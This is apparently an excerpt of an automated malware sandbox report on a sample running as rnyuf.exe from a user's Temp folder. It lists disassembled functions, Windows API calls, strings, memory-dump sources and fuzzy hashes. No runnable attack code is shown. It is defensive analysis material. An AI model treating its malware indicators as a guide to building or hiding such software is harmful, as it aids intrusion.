                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                          • String ID:
                                          • API String ID: 4031098158-0
                                          • Opcode ID: 32e52bd375f3f5b1997492bb121bd2a6ccc1c15e75b6fa3f303885303645d6e9
                                          • Instruction ID: 4f8109bb12adb53f58e68d9cff3a59482443a8845a86bc19a978a294444e78fb
                                          • Opcode Fuzzy Hash: 32e52bd375f3f5b1997492bb121bd2a6ccc1c15e75b6fa3f303885303645d6e9
                                          • Instruction Fuzzy Hash: AFD1AC75D002589FCF15CFA8C9809EDBBB5FF48364F28016AE855BB281DB30AD86DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F10E44, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,00F10E3B,00F10CA9,00F105B7), ref: 00F10E52
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F10E60
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F10E79
                                          • SetLastError.KERNEL32(00000000,00F10E3B,00F10CA9,00F105B7), ref: 00F10ECB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: e168135850fdd57b9c0da97ad267b2e50f27a97e2921464c3c35722c35b894b8
                                          • Instruction ID: e0a2ab848f5c19e22d65207dd5d9b902276e458e224a63ff5740201f04205297
                                          • Opcode Fuzzy Hash: e168135850fdd57b9c0da97ad267b2e50f27a97e2921464c3c35722c35b894b8
                                          • Instruction Fuzzy Hash: 4201D473A09716AEE62827767D95AD73A59FB05774B20062AF614801E2EFA64CC1B240
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1B498, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe, xrefs: 00F1B49D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                          • API String ID: 0-4023108300
                                          • Opcode ID: 3334f3d4d9cdf8dd5d1666523ad0da7d2762fa2096f32bc3a1d4fd5994c75b9c
                                          • Instruction ID: 7d82eda4c1d2f9b2145a68edad359a1b82073b1c045a23cf7fe64ddde1787f9f
                                          • Opcode Fuzzy Hash: 3334f3d4d9cdf8dd5d1666523ad0da7d2762fa2096f32bc3a1d4fd5994c75b9c
                                          • Instruction Fuzzy Hash: E521A172A08209FF9B20AF658C85DEB77ADEF003787144514FA29D7151EB35ED81BBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F12C0B, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _wcsrchr
                                          • String ID: .bat$.cmd$.com$.exe
                                          • API String ID: 1752292252-4019086052
                                          • Opcode ID: e691bc8ca52c1fa40ef4a6ba9725ce27e2482b8d9f0f7491b04321e0b8dfefbf
                                          • Instruction ID: 004d19dd4347b9d2438e4a0603e5e8ca78f51bbc5df1729760b07b660a92e675
                                          • Opcode Fuzzy Hash: e691bc8ca52c1fa40ef4a6ba9725ce27e2482b8d9f0f7491b04321e0b8dfefbf
                                          • Instruction Fuzzy Hash: 28012B27E0C326259A546099BE426BE73A98F91BB0725002AFD48F71C0EE8CDDA231D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F11154, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-
                                          • API String ID: 0-2084034818
                                          • Opcode ID: 55b8a61b326b4f047550f42585da118a3d0b9c854c66dbbd43fb993e988c7387
                                          • Instruction ID: c1e3304fdaa29ac71ae50cd16d98c64eca04d29f0bc64d8f22151a22fcb9f17d
                                          • Opcode Fuzzy Hash: 55b8a61b326b4f047550f42585da118a3d0b9c854c66dbbd43fb993e988c7387
                                          • Instruction Fuzzy Hash: E0119636E0A629FBCB229BA49C44B9BB75CBF017B0B210151EF05B7290D630DE41F6E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F12203, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00F121F8,?,?,00F121C0,00F03D80,73B76490,?), ref: 00F12218
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F1222B
                                          • FreeLibrary.KERNEL32(00000000,?,?,00F121F8,?,?,00F121C0,00F03D80,73B76490,?), ref: 00F1224E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 7567cf7be4e3f0b54ca404668debd50db6737ef08af4b819c84c3c849ea1c1f4
                                          • Instruction ID: 2a24dca367571b9b11d253c7c0827ad25737b88deab74899620797e2b45a5201
                                          • Opcode Fuzzy Hash: 7567cf7be4e3f0b54ca404668debd50db6737ef08af4b819c84c3c849ea1c1f4
                                          • Instruction Fuzzy Hash: FCF08230A08358FBEB21AB90DD0ABDEBA68EF40765F000090F800A11A0CB708E55FE90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1C807, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00F1C81F
                                            • Part of subcall function 00F16601: HeapFree.KERNEL32(00000000,00000000,?,00F1C89A,00000000,00000000,00000000,E800F310,?,00F1C8C1,00000000,00000007,00000000,?,00F1CCC3,00000000), ref: 00F16617
                                            • Part of subcall function 00F16601: GetLastError.KERNEL32(00000000,?,00F1C89A,00000000,00000000,00000000,E800F310,?,00F1C8C1,00000000,00000007,00000000,?,00F1CCC3,00000000,00000000), ref: 00F16629
                                          • _free.LIBCMT ref: 00F1C831
                                          • _free.LIBCMT ref: 00F1C843
                                          • _free.LIBCMT ref: 00F1C855
                                          • _free.LIBCMT ref: 00F1C867
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 6c002e3b1ee1a98cb681723826ce5574e58dd71d704140804b1ac0cc4d3a4564
                                          • Instruction ID: 2cd6093a0d76ddfb56a819604a7b1fd39b4a16780cca96ed1ed2727ba869d77a
                                          • Opcode Fuzzy Hash: 6c002e3b1ee1a98cb681723826ce5574e58dd71d704140804b1ac0cc4d3a4564
                                          • Instruction Fuzzy Hash: 8EF03632954214E7C620EB99E9C5C96B3DEAB04730754081AF049DB511CF36FCC0AAE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1AED3, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID: *?
                                          • API String ID: 269201875-2564092906
                                          • Opcode ID: 10ee6aa193b2a22c55cd56db50331241d1d9d032937cd9aa904c4765aaf002ea
                                          • Instruction ID: 9df18ecc0cea98f3ffc86d4444923fe833f34cd032c62c8eda1bc48c41e2e497
                                          • Opcode Fuzzy Hash: 10ee6aa193b2a22c55cd56db50331241d1d9d032937cd9aa904c4765aaf002ea
                                          • Instruction Fuzzy Hash: 03611DB6D00219DFDB14CFA8C8819EEFBF5EF48320B258169E855E7340D775AE819B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F2166E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00F2173E
                                          • _free.LIBCMT ref: 00F21767
                                          • SetEndOfFile.KERNEL32(00000000,00F1DB46,00000000,00F1649E,?,?,?,?,?,?,?,00F1DB46,00F1649E,00000000), ref: 00F21799
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00F1DB46,00F1649E,00000000,?,?,?,?,00000000), ref: 00F217B5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFileLast
                                          • String ID:
                                          • API String ID: 1547350101-0
                                          • Opcode ID: 5521ca9e8bcde5cdb03b9a1eee862941de734ffec66dc2097acb4421cb89944f
                                          • Instruction ID: 837f82011660e9884bd2528ac5cf90f25e01a264b70484aa3ea4e24e480728bc
                                          • Opcode Fuzzy Hash: 5521ca9e8bcde5cdb03b9a1eee862941de734ffec66dc2097acb4421cb89944f
                                          • Instruction Fuzzy Hash: 3841D732900655ABDB11ABB8DC46BDE3BB5BFA4330F240110F824E7191EB39D994B764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1AE04, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F12687: _free.LIBCMT ref: 00F12695
                                            • Part of subcall function 00F1BDDB: WideCharToMultiByte.KERNEL32(00F03D80,00000000,00F2E0A8,00000000,00F03D80,00F03D80,00F18DE7,?,00F2E0A8,?,00000000,?,00F18B56,0000FDE9,00000000,?), ref: 00F1BE7D
                                          • GetLastError.KERNEL32 ref: 00F1AE6C
                                          • __dosmaperr.LIBCMT ref: 00F1AE73
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00F1AEB2
                                          • __dosmaperr.LIBCMT ref: 00F1AEB9
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                          • String ID:
                                          • API String ID: 167067550-0
                                          • Opcode ID: 6f80abb73cfb6d8e3cf7f2d4a108a42a445d9182c42a54820e7773ac7a130d3a
                                          • Instruction ID: cad325dfa9373cb83fa16a2491aa60d3d49cbbafe831e4a1914e4e3359733772
                                          • Opcode Fuzzy Hash: 6f80abb73cfb6d8e3cf7f2d4a108a42a445d9182c42a54820e7773ac7a130d3a
                                          • Instruction Fuzzy Hash: F921C272A01309BF9B21AFA78C819EBB7ADEF003787104519F928D7144E735EDD0A7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F16EF2, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00F03D80,00F03D80,F98B5000,00F1889D,?,00F03D80,00F2E0A8,?,00F18D5C,00F03D80,73B76490,00F03D80,00F03D80,00F03D80,73B76490,00F0E3F3), ref: 00F16EF7
                                          • _free.LIBCMT ref: 00F16F54
                                          • _free.LIBCMT ref: 00F16F8A
                                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00F18D5C,00F03D80,73B76490,00F03D80,00F03D80,00F03D80,73B76490,00F0E3F3,?,00F124C5,00F0E3F3,00F2E0A8), ref: 00F16F95
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: c819e7c126433a9c57561a4ebb68c925b9531ae5977342d5b3e4fc39bed76912
                                          • Instruction ID: fbc3b81c249f586fd5d26969c878f220d529b5f66cb2bc7c76760e45cfaa9bb6
                                          • Opcode Fuzzy Hash: c819e7c126433a9c57561a4ebb68c925b9531ae5977342d5b3e4fc39bed76912
                                          • Instruction Fuzzy Hash: 0A11C67260C205ABD71177757C85EEB3A5A8BC07757250229F62CC62E1FE258CDB7210
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F17049, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00F0E3EC,00F0E3EC,E800F310,00F1320C,00F16B2D,?,?,00F0FD13,00F0E3EC,?,00F0EC38,E800F311,73B76490), ref: 00F1704E
                                          • _free.LIBCMT ref: 00F170AB
                                          • _free.LIBCMT ref: 00F170E1
                                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F0FD13,00F0E3EC,?,00F0EC38,E800F311,73B76490), ref: 00F170EC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: a7c4b4edbdd65db7167496b1fe9fd902b686c1ae845ee58f86dd6e264f343e3a
                                          • Instruction ID: 71d1a29843dac46cd3a38c7c99aa5dcca4fdac1b956931c90aeebee076cd5abe
                                          • Opcode Fuzzy Hash: a7c4b4edbdd65db7167496b1fe9fd902b686c1ae845ee58f86dd6e264f343e3a
                                          • Instruction Fuzzy Hash: AD11E57260C705ABD7117674ACC2EEB367A9BC83757210225F62C822D1EF258CD67220
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F177A5, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00F178A1,00000000,?,00F1E193,00000000,00000000,00F178A1,?,?,00000000,00000000,00000001), ref: 00F177BB
                                          • GetLastError.KERNEL32(?,00F1E193,00000000,00000000,00F178A1,?,?,00000000,00000000,00000001,00000000,00000000,?,00F178A1,00000000,00000104), ref: 00F177C5
                                          • __dosmaperr.LIBCMT ref: 00F177CC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorFullLastNamePath__dosmaperr
                                          • String ID:
                                          • API String ID: 2398240785-0
                                          • Opcode ID: 00a0961a51049240e8868a40922a6da333c2be4bb679707d7eb7e24988860df9
                                          • Instruction ID: b1195fb6bba9c273b83a62ce72be919a63a845e7481c440826c64826e1aed9f2
                                          • Opcode Fuzzy Hash: 00a0961a51049240e8868a40922a6da333c2be4bb679707d7eb7e24988860df9
                                          • Instruction Fuzzy Hash: 2BF04B32608215BB8B217FB6DC08D9ABF79FF453B07208510F51D86560CB32E8A1EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1773C, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00F178A1,00000000,?,00F1E208,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00F17752
                                          • GetLastError.KERNEL32(?,00F1E208,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00F178A1,00000000,00000104,?), ref: 00F1775C
                                          • __dosmaperr.LIBCMT ref: 00F17763
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorFullLastNamePath__dosmaperr
                                          • String ID:
                                          • API String ID: 2398240785-0
                                          • Opcode ID: 9441fa361f06d37b3deda2b9d7caff907e9472d28044e560b50f4e3046be87ec
                                          • Instruction ID: 2db6ffe6c7fe5a4a58431b482a3637f7671725675646eed5fb581dd0ad849c30
                                          • Opcode Fuzzy Hash: 9441fa361f06d37b3deda2b9d7caff907e9472d28044e560b50f4e3046be87ec
                                          • Instruction Fuzzy Hash: 95F0FB32609216BB8B207BB6DC0899ABF79FF453B07108511F52D96560D731E8A1EBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F21B95, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          • WriteConsoleW.KERNEL32(00F03D80,73B76490,00F2E0A8,00000000,00F03D80,?,00F1EFD2,00F03D80,00000001,00F03D80,00F03D80,?,00F1882C,00000000,?,00F03D80), ref: 00F21BAC
                                          • GetLastError.KERNEL32(?,00F1EFD2,00F03D80,00000001,00F03D80,00F03D80,?,00F1882C,00000000,?,00F03D80,00000000,00F03D80,?,00F18D80,00F03D80), ref: 00F21BB8
                                            • Part of subcall function 00F21B7E: CloseHandle.KERNEL32(FFFFFFFE,00F21BC8,?,00F1EFD2,00F03D80,00000001,00F03D80,00F03D80,?,00F1882C,00000000,?,00F03D80,00000000,00F03D80), ref: 00F21B8E
                                          • ___initconout.LIBCMT ref: 00F21BC8
                                            • Part of subcall function 00F21B40: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F21B6F,00F1EFBF,00F03D80,?,00F1882C,00000000,?,00F03D80,00000000), ref: 00F21B53
                                          • WriteConsoleW.KERNEL32(00F03D80,73B76490,00F2E0A8,00000000,?,00F1EFD2,00F03D80,00000001,00F03D80,00F03D80,?,00F1882C,00000000,?,00F03D80,00000000), ref: 00F21BDD
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: bcafcfe3536e5d19c30d5c9269947817e6fa0653b0f63901cce9ac55b2fb35ac
                                          • Instruction ID: b0f330bd3d13ba08fd77deda26e8b574b37ba8da889718a169e0bf06981a11df
                                          • Opcode Fuzzy Hash: bcafcfe3536e5d19c30d5c9269947817e6fa0653b0f63901cce9ac55b2fb35ac
                                          • Instruction Fuzzy Hash: 77F01C36505229BBCF226FE2EC14E8A3F26FF987B0F014050FA1885130DB328820FB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1583C, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00F15845
                                            • Part of subcall function 00F16601: HeapFree.KERNEL32(00000000,00000000,?,00F1C89A,00000000,00000000,00000000,E800F310,?,00F1C8C1,00000000,00000007,00000000,?,00F1CCC3,00000000), ref: 00F16617
                                            • Part of subcall function 00F16601: GetLastError.KERNEL32(00000000,?,00F1C89A,00000000,00000000,00000000,E800F310,?,00F1C8C1,00000000,00000007,00000000,?,00F1CCC3,00000000,00000000), ref: 00F16629
                                          • _free.LIBCMT ref: 00F15858
                                          • _free.LIBCMT ref: 00F15869
                                          • _free.LIBCMT ref: 00F1587A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: e2c0db8f32cb6898c6e783f4c1c92082b57394bfa76dd987a325e5a1e18b7684
                                          • Instruction ID: 8a93628a6cb096e39ea4c590f277982fbd1f95808c69640f0f1c2fa8ed6a9fa2
                                          • Opcode Fuzzy Hash: e2c0db8f32cb6898c6e783f4c1c92082b57394bfa76dd987a325e5a1e18b7684
                                          • Instruction Fuzzy Hash: FDE0EC79824128DA8B026F65BC85489FFF3F74AB313014816F4509A231CB3B05A2BF8D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F14EAB, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.926883454.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 00000005.00000002.926871926.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926907446.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926919620.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926928412.0000000000F33000.00000004.00020000.sdmp Download File
                                          • Associated: 00000005.00000002.926937980.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                          • API String ID: 0-4023108300
                                          • Opcode ID: 1df4d375d40b6d8d17b6cd175c1cbfdfc9285e59872dbe0b12522de1432059e3
                                          • Instruction ID: e82ea9a0276020347f01c3606422357dfd97a0df613e8cebbaff4b7c708de179
                                          • Opcode Fuzzy Hash: 1df4d375d40b6d8d17b6cd175c1cbfdfc9285e59872dbe0b12522de1432059e3
                                          • Instruction Fuzzy Hash: D8415E71E04219ABDB11EB999C81DEEBBE9FBC5320F140066F404E7351D771AA82BB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: rnyuf.exe PID: 6544 Parent PID: 968 rnyuf.exeCOMMON

                                          Executed Functions

                                          Function 00F121C1, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,00F121C0,?,?,?,?,?,00F13272), ref: 00F121E3
                                          • TerminateProcess.KERNEL32(00000000,?,00F121C0,?,?,?,?,?,00F13272), ref: 00F121EA
                                          • ExitProcess.KERNEL32 ref: 00F121FC
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
